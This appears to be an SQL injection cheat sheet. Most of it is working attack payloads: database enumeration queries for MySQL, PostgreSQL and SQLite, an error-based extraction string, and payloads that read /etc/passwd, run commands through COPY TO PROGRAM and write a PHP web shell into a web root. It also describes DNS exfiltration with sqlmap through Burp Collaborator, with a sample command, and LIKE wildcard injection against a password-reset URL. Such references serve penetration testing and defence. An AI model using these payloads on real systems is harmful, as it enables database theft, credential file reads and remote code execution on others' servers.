SQL Injection
Database enumeration
MySQL
SELECT GROUP_CONCAT(schema_name,',') FROM information_schema.schemata;
SELECT GROUP_CONCAT(table_name,',') FROM information_schema.tables;
SELECT GROUP_CONCAT(column_name,',') FROM information_schema.columns WHERE table_name = 'users';
PostgreSQL
SELECT datname FROM pg_database;
SELECT string_agg(table_name,',') FROM information_schema.tables;
SELECT string_agg(column_name,',') FROM information_schema.columns WHERE table_name = 'users';
SQLite
SELECT GROUP_CONCAT(tbl_name,',') FROM sqlite_master WHERE type='table' AND tbl_name NOT like 'sqlite_%';
SELECT sql FROM sqlite_master WHERE tbl_name='users';
SELECT GROUP_CONCAT(name,',') FROM PRAGMA_TABLE_INFO('users');
Error based
PostgreSQL
' AND 1=CAST((SELECT username FROM users) AS int)--
File read/write & RCE
PostgreSQL
SELECT pg_ls_dir('.');
SELECT pg_read_file('/etc/passwd');
COPY (SELECT '') TO PROGRAM 'sleep 5';
MySQL
SELECT LOAD_FILE('/etc/passwd');
SELECT '<?php system($_REQUEST[c]); ?>' INTO OUTFILE '/var/www/html/shell.php';
Faster Exfiltration via DNS
- https://github.com/PortSwigger/sqlmap-dns-collaborator
- https://arxiv.org/ftp/arxiv/papers/1303/1303.3047.pdf
SqlmapDnsCollaborator is a Burp Extension that lets you perform DNS exfiltration with Sqlmap with zero configuration needed. You won't need a domain name or a public IP, just a computer with Sqlmap and Burp.
How you would normally perform DNS exfiltration with Sqlmap:
- You buy a domain name, a public IP and then you set up a server
- You run Sqlmap on that server, which performs some SQL injection on the vulnerable target.
- Vulnerable target sends DNS requests to your DNS server containing interesting data.
- DNS requests are interpreted by Sqlmap.
How you are going to perform DNS exfiltration with Sqlmap and SqlmapDnsCollaborator:
- You open Burp on your computer and enable SqlmapDnsCollaborator.
- You run Sqlmap on your computer, which performs some SQL injection on the vulnerable target.
- Vulnerable target sends DNS requests to Burp Collaborator containing interesting data.
- SqlmapDnsCollaborator reads DNS requests from Burp Collaborator and sends them to Sqlmap.
- DNS requests are interpreted by Sqlmap.
sqlmap.py -r req.txt --dns-domain=yourcollab.burpcollaborator.net -v3
SQL "LIKE" Wildcard Injection
This vulnerability, often overlooked and considered low risk, can have significant impacts in certain scenarios. It involves injecting a wildcard in the search field of a LIKE clause in a SQL statement.
Types of Wildcards
-
%
: Equivalent to any string of zero or more characters. -
_
: Equivalent to any single character.
Vulnerability
An application becomes vulnerable when it uses the LIKE operator with a user-received parameter without filtering these wildcards. For example:
SELECT text FROM table WHERE secrets LIKE '$secret'
Even if the $secret
parameter is sanitized to prevent SQL injection, wildcards can still be injected:
http://www.vulnerable.com/reset.php?secret=<guessed_chars>_____________
"_" are the chars that match the wildcard